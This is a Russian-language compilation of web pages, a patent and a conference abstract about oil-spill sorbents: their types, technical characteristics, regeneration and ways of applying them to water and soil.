Сорбент для нефти и нефтепродуктов: виды и характеристики

Технические средства  

Технология сбора нефти и нефтепродуктов с поверхности воды при аварийных разливах включает качественно новый тип специализированных мобильных комплексов для ликвидации последствий  аварийных разливов нефти, принципиально отличающихся от ныне используемых в мире.

  Главное отличие заключается в том, что вместо традиционных боновых заграждений с функцией локализации пятна разлива и работающие в паре с триммерами (нефтесборщиками) предлагается использовать боны на основе сорбента «Мегасорб»,  совмещающие обе функции  —  локализация пятна разлива и одновременно сбор разлитой нефти благодаря её сорбции. Более того, такие боны будут использоваться многократно (десятки и сотни раз), так как сорбционная способность практически не  снижается на протяжении 500 циклов  сорбции – регенерации,  что было доказано в лабораторных условиях.

Порядок выполнения работ

При сборе нефти и нефтепродуктов с поверхности воды  сорбент «Мегасорб» может применяться в рамках различных технологических схем, например:

  • ограждение нефтяного пятна или группы пятен бонами любой конструкции;
  • стягивание нефтяного  пятна до увеличения толщины   до 3 – 5 мм и более;
  • размещение пластин сорбента «Мегасорб» на поверхности нефтяного пятна (для увеличения скорости работы рекомендуется перекрытие пластинами сорбента не менее 50% поверхности пятна);
  • поглощение нефти сорбентом при нормальных условиях и средней вязкости занимает 10-20 мин., при этом пластины сорбента полностью насыщаются нефтью, сохраняя при этом плавучесть;
  • перенос насыщенного нефтью сорбента к отжимному устройству и отжим при максимальной нагрузке не более 0,25 кг/см2(допускается использование ручных прессов или вальцов);
  • повторное стягивание  бонов  с сорбентом до устранения пленки нефтепродукта. Испытания Сорбент «Мегасорб»  прошел полевые испытания в Нижневартовском районе Западной Сибири на территории ОДАО «Белозернефть» на старом нефтяном разливе. Испытания проводила комиссия из представителей фирмы ООО «Грин».  В ходе испытания при многократном использовании пластины сорбента размером 1,0х0,5 м удалось убрать практически всю нефть с небольшого водоёма на старом нефтяном разливе.

  Структура

  Сорбент «Мегасорб»  представляет собой нетканый, волокнистый материал,  выполненный  в виде полотна, сформированного в единую, объемную гофрированную структуру из скрепленных между собой гидрофобных полимерных волокон.

При  таком способе формирования создаются дополнительные ёмкие полости, в которые нефть свободно проникает при непосредственном контакте, заполняет весь объем полотна за счет капиллярных сил, при этом прочно держится внутри гофрированной волокнистой структуры сорбента за счет адгезии и легко отделяется при отжиме.

  •      Гофрированная структура формирования
  • сорбента
  •                                                             
  •  Технические характеристики
  • сорбента

Поверхностная плотность,  кг/м2 …………………………………………………………………………………0,5 – 0,55

Толщина, мм……………………………………………………………………………………………………………………………25 – 50

Нефтеёмкость: при сборе с поверхности воды, кг/кг……………………………………………………35 – 40

                          в режиме фильтрации………………………………………………………………………………10 – 12

Рабочий диапазон температур воды, 0С……………………………………………………………….от +4 до + 50

Кол-во циклов регенерации отжимом……………………………………………………………………………………..500

Нефтеотдача при отжиме, %………………………………………………………………………………………………70 – 75

Скорость сорбции, кг/мин/кг………………………………………………………………………………………………….3 – 4

Скорость фильтрации, м/час

                 — рабочий режим……………………………………………………………………………………………………..5 – 7

                 — форсированный режим…………………………………………………………………………………….8 – 10 

Степень очистки,  %………………………………………………………………………………………………………….97,5 – 98

Регенерация  ………………………………………………………………………………………….промывка противотоком

                                                                                                       отжим прессом, валиками

Утилизация…………………………………………………………………………………………………………………………Сжигание

Форма выпуска

Сорбент «Мегасорб» вырабатывается из смеси полимерных химических волокон  в виде нетканого холста шириной 1,0 или 2,0 м в рулонах длиной по 10 или 20 м. Выпускается двух марок:

  • «А» –  для сбора сырой нефти и нефтепродуктов с поверхности воды и грунта при аварийных разливах.
  • «Ф» –  фильтрующая загрузка для очистки промышленных и сточных вод от эмульгированных нефтепродуктов. Изделия
    • Боны
    • Маты
    • Подушки
    • Салфетки
    • Кассеты
    • Фильтр-пакеты

Эксплуатационные характеристики

сорбента

    Благодаря упругой структуре состоящих из чередующихся плотных слоёв и пустот сорбент «Мегасорб» способен выдерживать многократные нагрузки при отжиме, не изменяя при этом своей структуры.

  В лабораторных условиях были проведены ресурсные испытания сорбента, которые показали (см. рис.), что механическая прочность структуры была нарушена только к 500 циклу регенерации отжимом при нагрузке 0,25 кг/см2.

  При этом количество впитанной нефти и количество отжатой нефти оставалось на уровне 25 и 15 г/г, что существенно превышает показатели аналогов.

Изменение нефтеёмкости сорбента

и кол-ва отжатой нефти при многократных циклах регенерации отжимом

Исследовалась способность сорбента впитывать нефтепродукты с различной вязкостью. Из графика видно (см. рис.), что  сорбент «Мегасорб» одинаково хорошо впитывает как  легкие жидкие моторные масла, так и густые высокопарафиновые виды нефтепродуктов.

Изменение нефтеёмкости сорбента

для нефтепродуктов с различной вязкостью

  Сравнительные  характеристики

             Проведены сравнительные лабораторные испытания сорбента  Мегасорб с лучшими отечественными и зарубежными аналогами по нефтеёмкости и нефтеотдаче при сборе нефти с поверхности воды и при отжиме.

Источник: https://sorbent-megasorb.ru/megasorb

Сравнительная характеристика сорбентов, используемых в составе биопрепаратов для очистки почвы от нефтезагрязнений

Статья опубликована в рамках: XXXIV Международной научно-практической конференции «Наука вчера, сегодня, завтра» (Россия, г. Новосибирск, 11 мая 2016 г.)

Наука: Биология

Скачать книгу(-и): Сборник статей конференции часть 1, Сборник статей конференции часть 2

Библиографическое описание:Коновалова Е.А., Лазыкин А.Г., Гаврилов К.Е. [и др.] Сравнительная характеристика сорбентов, используемых в составе биопрепаратов для очистки почвы от нефтезагрязнений // Наука вчера, сегодня, завтра: сб. ст. по матер. XXXIV междунар. науч.-практ. конф. № 5(27). Часть I.

– Новосибирск: СибАК, 2016. – С. 6-17. У данной статьи нет дипломов

  • COMPARATIVE PERFOMANCE OF SORBENTS, USED IN THE COMPOSITION OF BIOLOGICAL PRODUCT FOR PURIFICATION SOIL OF OIL-CONTAMINATED
  • Ekaterina Konovalova
  • master student of the Department of Microbiology, Vyatka State University,
  • Russia, Kirov
  • Aleksey Lazykin
  • candidate of Biological Sciences, assistant professor of Vyatka State University, Russia, Kirov
  • Konstantin Gavrilov
  • candidate of Biological Sciences, assistant professor of Vyatka State University, Russia, Kirov
  • Ilya Darmov
  • doctor of Biological Sciences, Head of the Department of Microbiology, professor of Vyatka State University,
  • Russia, Kirov

 

АННОТАЦИЯ

Объектом исследования являются природные и искусственные материалы, применяемые в качестве сорбентов нефти. Целью настоящей работы являлась сравнительная оценка различных материалов, используемых в качестве сорбентов нефти и нефтепродуктов для создания биопрепаратов на их основе.

Анализ осуществлялся по комплексу параметров, включающих как сорбционные характеристики образцов, так и физические, экономические, экологические свойства, а также способность к иммобилизации на их поверхности микроорганизмов-нефтедеструкторов.

Наряду с традиционными гравиметрическими методами применялась концентратометрия с использованием ИК-спектрометрического концентратомера нефтепродуктов АН-2 и определялась интегральная токсичность образцов при помощи биолюминометра Биотокс-10М.

Использовались классические микробиологические методы, а также методы статистической обработки экспериментальных данных.

ABSTRACT

Источник: https://sibac.info/conf/science/xxxiv/53350

Сорбент «Ньюсорб-ППУ» производства ООО "ЛАРН 32"

Дилер производителя оборудования ЛАРН ООО «ЛАРН 32» в городе Москва.

Оборудование и материалыдля ликвидации аварийныхразливов нефти

от производителя

+7 (495) 545 77 25, +7 903 238 34 44

Сорбент «Ньюсорб-ППУ»

Сорбент «Ньюсорб-ППУ» применяется для сорбции нефти и нефтепродуктов, отработанных масел, дизельного топлива, гидравлических жидкостей, растительных и синтетических масел.

«Ньюсорб-ППУ» решает проблему сбора разливов нефти и нефтепродуктов как с водной, так и с твердых поверхностей, используется как самостоятельно, так и служит прекрасным наполнителем сорбирующих изделий.

«Ньюсорб-ППУ» пригоден также для очистки сточных вод от растворённых и плавающих нефтепродуктов.

Подходит для применения в очистных сооружениях и ливневых системах для улавливания нефтепродуктов.

«Ньюсорб-ППУ» успешно применяется на АЗС ОАО «НК «Роснефть».

Сорбент можно использовать многократно, для регенерации достаточно отжать сорбент впитавший нефтепродукт.

После того как сорбент исчерпал свой ресурс — он может быть утилизирован сжиганием на установках «Факел-60». Сорбент «Ньюсорб-ППУ» не содержит твердых наполнителей и образует малый зольный остаток.

Технические характеристики «Ньюсорб-ППУ»:

Наименование параметра Значение
Нефтеемкость, кг нефтепродукта/ кг сорбента до 32
 Объемный вес, кг/м3 13,6
 Плавучесть неограниченное время

Видео о применении сорбента «Ньюсорб-ППУ»

 СКАЧАТЬ ИНФОРМАЦИОННЫЙ ЛИСТ о сорбенте «Ньюсорб-ППУ»

Источник: https://www.larn77.ru/catalog/detail8.htm

Сорбент нефти и нефтепродуктов С-ВЕРАД. Статьи компании «Экологическая и Промышленная Безопасность — это ПРИОРИТЕТ»

Минеральный сорбент С-ВЕРАД используется, прежде всего, для задержки, сбора и удаления нефти, нефтепродуктов (бензин, дизельное топливо, масел, жиров, органических растворителей и других углеводородосодержащих веществ) в широком диапазоне температур — сорбирующая способность сохраняется даже при низких температурах до тех пор, пока не произойдет полное замерзание впитываемого нефтепродукта. С-ВЕРАД хорошо себя зарекомендовал в процессе ликвидации аварийных разливов при низких отрицательных температурах (совместная программа с Институтом Проблем Промышленной Экологии Севера). Сорбент получил широкое распространение благодаря своей универсальности, а именно способности к ликвидации загрязнений как на суше, так и в водоемах со стоячей и проточной водой.

Сорбент С-ВЕРАД для сбора нефтепродуктов применяется самостоятельно как гидрофобный минеральный сорбент, так и в качестве наполнителя для целого ряда сорбирующих изделий – бонов, матов.

Одна из модификаций сорбента С-ВЕРАД используется как гидрофобный сорбирующий материал в качестве загрузки фильтрующих кассет и фильтрующих элементов, установок и станций для очистки промышленных стоков, локальных очистных сооружений, очистки поверхностных стоков.

Изготовлен на основе природного минерала с 99 % пористостью, с наноуглеродной гидрофобной поверхностью, обработанного нефтеокисляющими бактериями.

Выбор сорбента является важнейшим аспектом промышленной безопасности. Далеко не все материалы, которые способны что-то поглощать, можно назвать сорбентами для сбора нефтепродуктов. Такие природные материалы, как торф, мох, опилки, бумажные отходы, ветошь, различные полимеры совершенно не годятся для ликвидации разливов нефти и нефтепродуктов, потому что они не только горят сами, но и понижают температуру вспышки собранных нефтепродуктов, поэтому такие материалы не соответствуют требованиям пожарной безопасности. Другие негорючие сорбенты, такие как диатомит, глина, обладают очень малой нефтеемкостью,(порядка 1 г/г) поэтому эффективность их использования низка и экономически не выгодна. Особенно если учесть их высокую насыпную плотность – это неудобно не только при транспортировке, но и не годится такой сорбент для сбора разливов на водной поверхности.

Модификации сорбента С-ВЕРАД

Сорбент нефти С-ВЕРАД БИО для сбора разливов нефтепродуктов

Биосорбент нефти С-ВЕРАД БИО используется самостоятельно в роли гидрофобного сорбента. Используется для ликвидации загрязнений образовавшихся на водной поверхности (реки, пруды, озера) и твердой (почва, прибрежный участок, грунт, бетон и т.д.

) поверхности от воздействия нефти и ее производных — мазут, бензин, дизельное топливо, машинные и гидравлические масла, кислоты, щелочи и т.д.

Кроме того, благодаря обработке уникальными нефтеокисляющими бактериальными культурами, сорбент С-ВЕРАД участвует в ремедиации загрязненных земель — деструкция нефтепродуктов приводит к быстрой биодеградации загрязнения.

При использовании такого сорбента не обязательна его перевозка с места применения и утилизация. Безопасность хранения подтверждена Паспором Безопасности. Биоразложение происходит в течение 90 суток.

Сорбент С-ВЕРАД для фильтров

Сорбент С-ВЕРАД для фильтров – данная модификация выпускается специально для использования в локальных очистных сооружения, очистки ливневых, поверхностных, промышленных стоков.

В отличие от полимерных, угольных сорбентов С-ВЕРАД для фильтров не горит и может использоваться на любых очистных сооружениях промышленных объектов.

При залповых выбросах нефтепродуктов, масел пористая структура сорбента не забивается благодаря покрытию наноуглеродной гидрофобной пленкой, в отличие от угольных фильтров, которые в этом случае приходится менять раньше срока.

Благодаря обработке нефтеокисляющими бактериями, происходит частичная деструкция нефтепродуктов уже в самом сорбенте, что существенно увеличивает срок службы фильтрующей загрузки. В отличие от торфяных загрузок, С-ВЕРАД не подвержен гниению, не разрушается, не забивает систему, является химически стойким. Обладает высокой динамической емкостью по нефтепродуктам (этот показатель на порядок выше, чем у угольных сорбентов).

Сорбенты нефтепродуктов торговой марки С-ВЕРАД удобны и экономичны в использовании. Купить сорбент нефти от производителя можно прямо на нашем официальном сайте. Для уточнения цены на сорбент, свяжитесь с нами по телефону +7800505-31-57 или по электронной почте marisah@mail.ru

Источник: https://xn--90aijsemenr.xn--p1ai/a215091-sorbent-nefti-nefteproduktov.html

биоразлагаемый композиционный сорбент нефти и нефтепродуктов

Изобретение относится к области биотехнологии. Предложен биоразлагаемый композиционный сорбент нефти и нефтепродуктов.

Сорбент содержит термопластичный полимер с волокнообразующими свойствами, полученный методом аэродинамического формования, и нестерильные растения рода Сфагнум (Sphagnum), инкорпорированные в термопластичный полимер в процессе его аэродинамического формования в количестве 10-50% от массы термопластичного полимера. При этом материал, сформованный из термопластичного полимера, имеет объемную плотность 50-220 кг/м3, диаметр волокон 4-41 мкм. Полимер выбран из группы, включающей полипропилен или его сополимер с этиленом, сополимер акрилонитрила с метилакрилатом. Преимуществом изобретения является повышение эффективности сорбента, емкостных характеристик по нефти и нефтепродуктам, плавучести, удерживающих способностей. 1 з.п. ф-лы, 2 пр.

Изобретение относится к новому композиционному сорбенту нефти и нефтепродуктов на основе растительного сырья — растений рода Сфагнум (Shpagnum) и может быть использовано при безотходной очистке от аварийных разливов нефти и нефтепродуктов природных и искусственных водоемов, сточных вод, жидких отходов производств, твердых поверхностей, а также в качестве превентивной меры. Указанный материал возможно использовать на всех объектах, связанных с добычей и транспортировкой (в том числе, на подводных трубопроводах) нефти.

Нефть и нефтепродукты относятся к высокотоксичным загрязняющим веществам, воздействие которых может нарушать равновесие экосистем, особенно при локализации в донных отложениях.

Учитывая возрастающие объемы добычи нефти, в том числе, при освоении шельфов, указанная проблема является особенно острой, а совершенствование сорбционных методов очистки, как наиболее эффективных в ряду физико-химических способов, является актуальной задачей.

Известен сорбционный препарат (RU № 2307707, 2007) содержащий торфяной наполнитель и органический активатор. В качестве торфяного наполнителя используют нестерильный верховой сфагновый мох или верховой слаборазложившийся сфагновый торф, а в качестве органического активатора — природный полимер арабиногалактан.

При этом полученный адсорбент недостаточно эффективен вследствие сыпучей структуры, приводящей к сложностям нанесения его на поверхность акватории, невозможности использования на дне акватории. Кроме того, сбор и утилизация использованного сорбента проблематичны.

Более близким к изобретению является волокнисто-пористый сорбент, получаемый автогидролизом целлюлозосодержащего сырья при высокой температуре и давлении с последующей декомпрессией.

При этом в качестве целлюлозосодержащего сырья используют отходы деревообработки, смешанные со вспененным полистиролом при определенном соотношении компонентов (RU № 2435641, 2010).

Полученный сорбент содержит от 10 до 60% масс. древесных отходов.

Известный сорбент обладает низкими показателями нефтеемкости и маслоемкости. При содержании древесных отходов 20% максимальный показатель нефтеемкости равен 8,84 г/г и максимальный показатель маслоемкости равен 9,48 г/г.

Кроме того, указанному сорбенту свойственна низкая степень утилизации значительной части тяжелых фракций нефти и нефтепродуктов, осевших на дно после аварийного разлива.

Недостатком данного сорбента является также использование отходов деревообработки — древесных опилок хвойных пород деревьев, в которых содержится не природный протолигнин, а измененные лигниносодержащие вещества или смеси веществ, оказывающие токсическое и мутагенное действие, что снижает степень его экологичности. При этом, при хранении отходов деревообработки, содержащиеся вещества имеют свойство самовозгораться с выделением сернистых, азотистых и других вредных соединений, что требует соблюдения определенных условий хранения лигносодержащих сорбентов.

  • Таким образом, данный сорбент не является достаточно эффективным.
  • Задача изобретения состоит в получении эффективного универсального композиционного материала, соответствующего всем требованиям, предъявляемым к нефтяным сорбентам: высокая сорбционная емкость по нефти и нефтепродуктам, плавучесть, хорошая удерживающая способность и биоразлагаемость.
  • Поставленная задача достигается созданием биоразлагаемого композиционного сорбента, содержащего термопластичный полимер с волокнообразующими свойствами, полученный методом аэродинамического формования, и наполнитель, представляющий собой нестерильные растения рода Сфагнум (Sphagnum), инкорпорированный в термопластичный полимер в процессе его формования в количестве 10-50% от массы термопластичного полимера.
  • Предпочтительно термопластичный полимер имеет объемную плотность 50-220 кг/м3, диаметр волокон 4-41 мкм и выбран из группы полипропилен или его сополимер, сополимер акрилонитрила с метилакрилатом.
  • Технический результат заключается в повышении эффективности сорбента, в частности, в повышении его емкостных характеристик по нефти и нефтепродуктам (сорбционная емкость составляет не менее 40-70 г/г сорбента в зависимости от плотности нефти и нефтепродуктов), плавучести (не менее 3 суток), удерживающих способностей (не менее 5 минут).

Получение нетканых полимерных волокон, содержащих в качестве наполнителя нестерильные растения рода Сфагнум (Sphagnum), осуществляют методом аэродинамического формования. Метод аэродинамического формования описан, например, в Роговин З.А. Основы химии и технологии производства химических волокон т.II, М.

, Химия, 1965. С.186-195. При этом исходное полимерное сырье в виде гранул расплавляют в плавильном устройстве — экструдере, либо растворяют в растворителе, например, диметилформамиде и фильтруют для удаления примесей.

К расплаву или раствору полимера добавляют предварительно подготовленные нестерильные растения рода Сфагнум (Sphagnum) и продавливают через фильерный блок. Выходящие из фильеры струи с помощью соплового устройства вытягивают и направляют на поверхность приемного устройства.

Одновременно на поверхность приемного устройства из форсунок подают осадительную ванну. В результате чего происходит отверждение волокон и формируется структура волокнистого полимерного холста, в который инкорпорированы нестерильные растения рода Сфагнум (Sphagnum).

Сформованный холст полимерного нетканого материала снимают с приемной поверхности, отмывают от растворителя в промывном устройстве и высушивают в сушилке при температуре 70÷100°С.

Полипропиленовые волокна формуют из расплавов полимеров пропилена или его сополимеров. Сополимер акрилонитрила с метилакрилатом формуют из его раствора в диметилформамиде.

Возможно использование также других видов термопластичного полимера, в частности, полиэфирных полимеров.

В данном случае волокна формуют из расплавов различных полимеров, в частности из расплава полиэтилентерефталата, полибутилентерефталата, поликарбоната, полиакрилата и других.

Процедура предварительной подготовки нестерильного растения рода Сфагнум (Sphagnum) заключается в следующем.

Сначала исходное растительное сырье, например, нестерильный сфагновой мох (Sphagnum) различных видов сушат либо в естественных условиях при комнатной температуре, либо в сушильном шкафу, при температуре 50-70°С, до постоянного веса, контролируемого с помощью электронных весов.

Время сушки зависит от содержания влаги в исходном материале и может варьироваться от нескольких дней до нескольких часов. Далее высушенный сфагновый мох измельчают в виброшаровой мельнице с электроприводом. Помол осуществляют в стальном стакане с крышкой, частично заполненном шариками диаметром около 5-6 мм из того же материала, что и стакан. Количество шариков — 2 или 3 штуки.

Дисперсность материала после измельчения составляет 50-60 мкм. Инкорпорирование измельченных нестерильных растений рода Сфагнум (Sphagnum) проводят в процессе получения полимерных волокон из расплавов или растворов методом аэродинамического формования. Количество вводимого наполнителя может составлять от 10 до 50% от массы термопластичного полимера, предпочтительно, 30% масс.

Используемые в качестве наполнителя растения рода Сфагнум (Sphagnum), в частности, сфагнум дубравный (Sphagnum nemoreum), сфагнум компактный (Sphagnum compactum), сфагнум оттопыренный (Sphagnum squarrosum), благодаря волокнисто-пористой структуре и высоким адсорбционным свойствам, играют роль как структур дополнительной аккумуляции нефти и нефтепродуктов, так и источника биогенных элементов для заселения данных материалов аборигенными бактериями-нефтедеструкторами окружающей среды. Кроме этого, пористая структура используемого наполнителя способствует накоплению в своих порах кислорода, тем самым повышая скорость окисления нефти и нефтепродуктов аборигенными бактериями-нефтедеструкторами.

При этом введение достаточного количества нестерильного растения рода Сфагнум (Sphagnum) на стадии формования термопластичного полимера (нетканого полимерного материала) аэродинамическим методом позволяет получить неожиданный дополнительный эффект, а именно, повышение пористости целевого сорбента и, как следствие, увеличение адсорбционных показателей, а также более высокой степени заселения данного материала бактериями — нефтедеструкторами и аборигенными микроорганизмами за счет повышения сродства синтетического нетканого полимерного материала к биологическим объектам. Измельченные растения рода Сфагнум (Sphasnum) служат основой для прикрепления и иммобилизации клеток аборигенных бактерий-нефтедеструкторов, а также обеспечивают данные бактерии-нефтедеструкторы необходимыми биогенными питательными элементами для поддержания физиолого-биохимического потенциала бактериальной клетки.

Кроме того, данные измельченные нестерильные растения рода Сфагнум (Sphagnum) (клеточные структуры) способствуют разложению полимерного нетканого волокна микроорганизмами на короткие фрагменты, тем самым делая данный материал биоразлагаемым. В результате исключается необходимость утилизации отработанных материалов.

Возможно использовать термопластичный полимер с объемной плотностью 50-220 кг/м 3 и диаметром волокон 4-41 мкм, содержащий в своей структуре поры (межволоконное пространство) оптимального размера, позволяющие сорбенту не только насыщаться за минимально короткий срок, но и удерживать сорбируемый продукт. В результате сорбционная емкость матрицы составляет от 40 до 70 г/г (в зависимости от плотности нефти и нефтепродуктов).

Под термином «нефть и нефтепродукты» в рамках данной заявки понимают такие, в частности, продукты, как нефти различного происхождения, продукты ее первичной и вторичной переработки, как, например, топлива, горюче-смазочные материалы, остаточные нефтепродукты, отходы нефтепереработки, углеводородное сырье.

Схема применения описываемого материала заключается в следующем: для извлечения нефтяных углеводородов из водных сред сорбирующее полотно укладывают на поверхность нефтяной пленки, пленки нефтепродуктов или водно-органической эмульсии.

В результате волнения водной среды сорбент погружается в толщу эмульсии, где происходит избирательная адсорбция нефти из смешанной среды на полимерных волокнах. При ликвидации нефтяных пленок с поверхности воды в стоячих водоемах сорбирующее полотно расстилается на поверхность нефтяного пятна.

Материал является универсальным сорбентом, позволяющим собирать углеводороды легких, средних и тяжелых фракций нефти, а также нефтепродукты.

При этом, инкорпорированные и равномерно распределенные растения рода Сфагнум (Sphagnum) в структуре нетканого полимерного волокна — термопластичного полимера, способствуют его разложению микроорганизмами на короткие фрагменты, тем самым делая данный материал биоразлагаемым. В результате исключается необходимость утилизации отработанных материалов.

Приведенные примеры иллюстрируют, но не ограничивают данное изобретение.

Пример 1

Для сбора тонких пленок нефти и нефтепродуктов с водной поверхности используют биоразлагаемый композиционный сорбент на основе полипропилена или его сополимера с этиленом (термопластичный полимер), имеющего объемную плотность 133 кг/м3 и диаметр волокон 5-10 мкм.

Данный композиционный сорбент содержит 30% от массы термопластичного полимера высушенного и измельченного растения рода Сфагнум (Sphagnum) — Сфагнума дубравного (Sphagnum nemoreum) от массы термопластичного полимера.

Указанный сорбент помещают на участок загрязненной акватории.

Сорбент, имеющий указанные характеристики, обладает сорбционной емкостью 40 г нефти (плотность 889 кг/м3) на г сорбента, плавучестью не менее суток, временем удержания сорбата не менее 10 минут при удалении сорбента с сорбатом с поверхности акватории.

Пример 2

Для сбора нефти и нефтепродуктов на дне акваторий используют композиционный сорбент на основе сополимера акрилонитрила с метилакрилатом (термопластичный полимер), имеющего объемную плотность 80 кг/м3 и диаметр волокон 25-28 мкм.

Данный композиционный сорбент содержит 10% от массы термопластичного полимера высушенного и измельченного растения рода Сфагнум (Sphagnum) — Сфагнума компактного (Sphagnum compactum) от массы термопластичного полимера.

Указанный материал, благодаря низкой плавучести, погружается на донный участок загрязненной акватории, адсорбируя при этом нефть и нефтепродукты с водной поверхности.

Сорбент, имеющий указанные характеристики, обладает сорбционной емкостью 35 г нефти (плотность 889 кг/м3 ) на г сорбента, временем удержания сорбата не менее 10 минут при удалении сорбента с сорбатом с поверхности акватории.

Использование в сорбенте других видов термопластичных полимеров и других оговоренных выше концентраций наполнителя приводит к аналогичным результатам.

Таким образом, описываемый биоразлагаемый композиционный сорбент обладает высокими емкостными характеристиками. Так, коэффициент нефтеемкости данного сорбента выше в 4-5 раз аналогичного коэффициента известного сорбента, коэффициент нефтеемкости по мазуту составляет 70 г/г.

Описываемый сорбент позволяет собирать нефть и нефтепродукты с твердых поверхностей или с поверхности акваторий в количестве, превышающем не менее чем в 40-70 раз собственный вес, удерживать длительное время сорбат при удалении его с места разлива. Включение измельченных растений рода Сфагнум (Sphagnum) способствует биоразложению нетканого полимерного волокна.

В результате исключается необходимость утилизации отработанных материалов. Обладая высоким сродством к нефти и нефтепродуктам, сорбент способен поглощать нефтяные пленки различной толщины, а также избирательно извлекать нефть из водно-органических эмульсий.

Одной из сфер применения сорбента является также извлечение нефти и нефтепродуктов из смешанных сред в качестве фильтрующего материала при очистке балластных вод судов, сточных и других вод, отходов производства. Особенностью сорбента является возможность его применения в подводных условиях.

Формула изобретения

1.

Биоразлагаемый композиционный сорбент нефти и нефтепродуктов, содержащий термопластичный полимер с волокнообразующими свойствами, полученный методом аэродинамического формования, и наполнитель, представляющий собой нестерильные растения рода Сфагнум (Sphagnum), инкорпорированный в термопластичный полимер в процессе его аэродинамического формования в количестве 10-50% от массы термопластичного полимера.

2. Биоразлагаемый композиционный сорбент по п.1, отличающийся тем, что материал, сформованный из термопластичного полимера, имеет объемную плотность 50-220 кг/м3, диаметр волокон 4-41 мкм, а полимер выбран из группы, включающей полипропилен или его сополимер с этиленом, сополимер акрилонитрила с метилакрилатом.

Источник: http://www.freepatent.ru/patents/2528863

Сорбенты и их применения при ликвидации разливов нефтепродуктов

Сорбенты и их применения при ликвидации разливов нефтепродуктов.

Сорбенты (название от лат. sorbens — поглощающий) – одним словом твердые тела или жидкости, сорбирующие (избирательно поглощающие) пары, газы или растворенные вещества из окружающей среды.

Твердые сорбенты делятся на: волокнистые и гранулированные. Волокнистые сорбенты в отличие от гранулированных обладают более высокой скоростью сорбции.

Помимо этого, волокнистые сорбенты отличаются наибольшими показателями по регенеративной способности для возможности повторного применения, что актуально для промышленных сфер применения устранения аварийных разливов нефтепродуктов, нефти и иных агрессивных веществ.

Сорбенты применяются для устранения последствий нефтезагрязнения. Последствия аварий устраняют с помощью волокнистых сорбентов, так как применение технологий щадящего устранения позволяют снизить нежелательные последствия для окружающей среды.

Использование данных сорбентов приводит к значительному снижению стоимости затрат и снижает как прямо, так и косвенно степень загрязнения окружающей среды. А так же, сорбенты применяются как штатные средства для очистки технической воды, применяемой в промышленности и для экологической безопасности на АЗС.

Волокнистый сорбент является одним из наиболее эффективных и основных фильтрующих компонентов, применяющихся в ливневой канализации.

В настоящее время в мире производится и используется примерно две сотни различных сорбентов. Используют их для ликвидации нефтяных пятен и разливов.

Они подразделяются на: природные органические (например, Ньюсорб), неорганические (например, Ньюсорб-М, Ньюсорб-М плюс), органоминеральные и синтетические (например, Ньюсорб-ППУ) .

Качество сорбентов определяется их емкостью по отношению к нефти, плавучестью после сорбции нефти, степенью гидрофобности, то есть ненамокаемостью в воде, а так же возможностью десорбции нефти утилизации или регенерации сорбента.

Неорганические сорбенты.

К неорганическим сорбентам относятся: диатомитовые породы (рыхлый диатомит – кизельгур), различные виды глин, песок , пемза, туфы, цеолиты, перлит и т. п.

Соответственно диатомиты и глина являются большей частью товара на рынке сорбентов, так как имеют низкую стоимость и возможность производства в больших объёмах, а так же широко используется песок , им засыпают небольшие участки разливов нефти и нефтепродуктов.

Однако с экологической точки зрения качество неорганических сорбентов не вполне приемлемо, так как в силу своей низкой емкости (70-150% по нефти) не удерживают бензин, дизельное топливо, керосин.

При ликвидации последствий разливов нефтепродуктов в водной среде вместе с нефтью тонут и неорганические сорбенты, тем самым не решая проблемы очистки воды от загрязнения. Разумным выходом из этой ситуации является утилизация этих сорбентов путем выжигания и промывки водой с ПАВ или экстрагентами.

Синтетические сорбенты.

Данный вид сорбентов используется чаще всего в странах, где высокоразвита нефтехимическая промышленность (это станы ЕЭС, США, Япония). Изготавливаются они из полипропиленовых волокон, из которых формируют нетканые полотна. Широко используют формованный полиэтилен с полимерными наполнителями, полиуретан в гранулированном или губчатом виде, а так же другие виды пластиков.

Различают 2 типа синтетических сорбентов: гидрофобные и негидрофобные. К положительным особенностям этих сорбентов относится их высокие сорбционные свойства, легкость сбора после использования, а так же возможность их повторного использования после механического отжима на отжимных устройствах.

Органоминеральные и природные органические сорбенты.

Для ликвидации нефтяных загрязнений они являются наиболее перспективным видом сорбентов. Наиболее частыми для применения являются модифицированный торф, макулатура, опилки, древесная щепа, шерсть, высушенные злаковые культуры. Лучшими органоминеральными сорбентами считаются сорбенты на основе сфагнового торфа.

К данным видам относятся «Ньюсорб» — гидрофобный нефтяной сорбент. Он представляет из себя торф из мха сфагнума, гидрофобизированный и измельченный нехимическим способом. Этот вид сорбента не нарушает экологический баланс и идеален для достижения чистоты.

Данное вещество, при отрицательной температуре, на воде и на твердой поверхности не теряет своих свойств, экологичен и безопасен для окружающей среды, людей, животных до и после использования, сорбент полностью разлагается со временем и не требует сбора.

Положительным особенностям этих сорбентов является: механизация его нанесения распылителями сорбентов АРС, а так же сбор неиспользованного сорбента автономными сборщиками АСС.

ООО «ЛАРН 32» явлется прямым производителем вышеперечисленных сорбентов, а так же механизированных средств для их нанесения, сбора и утилизации (установка для утилизации нефтесодержащих отходов Факел-60).

Источник: https://larn32.ru/article/detail55.htm

Сорбент

Сорбент для сбора нефти ВД-1 Новинка!

Сорбент эффективно очищает от нефти любые водные и твердые поверхности. Позволяет ликвидировать аварийные разливы нефти и нефтепродуктов в арктических условиях.

Применяется для подъема тяжелой нефти, осевшей на дно водоемов.

Эффективен при создании защитных буферных зон вдоль побережья от загрязнений нефтью со стороны моря: очистка от загрязнения нефтью песчаных побережий и скал, очистка почвенного слоя от нефти методом выжигания, очистка оперенья птиц и шерсти животных.

Сорбенты нефтепродуктов, применение: способы нанесения выбираются, исходя из технических возможностей подразделений, задействованных в выполнении спасательных работ, условий погоды и предполагаемых в дальнейшем мероприятий по сбору сорбированной массы.

Мастика теплоизолирующая огнеупорная «Барьер-1500»

Мастика представляет собой двухкомпонентный состав. После соединения сухой и жидкой части приобретает консистенцию штукатурки и наносится аналогичными инструментами и способом.

После застывания образует твердую прочную поверхность, которая не требует никаких дополнительных мер защиты.

Мастика обладает очень хорошей адгезией к металлу и огнеупорному кирпичу, после застывания образует монолит, устойчивый к механическому воздействию, кислотам и щелочам.

Огнеупорная мастика не имеет запаха и не выделяет вредных веществ при нагреве.

Покрытие защитное теплоизолирующее «Барьер»

Покрытие теплоизолирующее защитное «Барьер» стирол-акриловое, латексное, с наполнителем из микросфер и специальных добавок представляет собой однокомпонентный состав на водной основе в готовом к использованию виде.

Теплоизолирующее покрытие экологически безопасно, не имеет запаха и вредных выделений, быстро сохнет, обладает высокой стойкостью к воздействию ультрафиолетовых лучей, высокой адгезией к окрашиваемым поверхностям, влагонепроницаемо, не поддерживает горение.

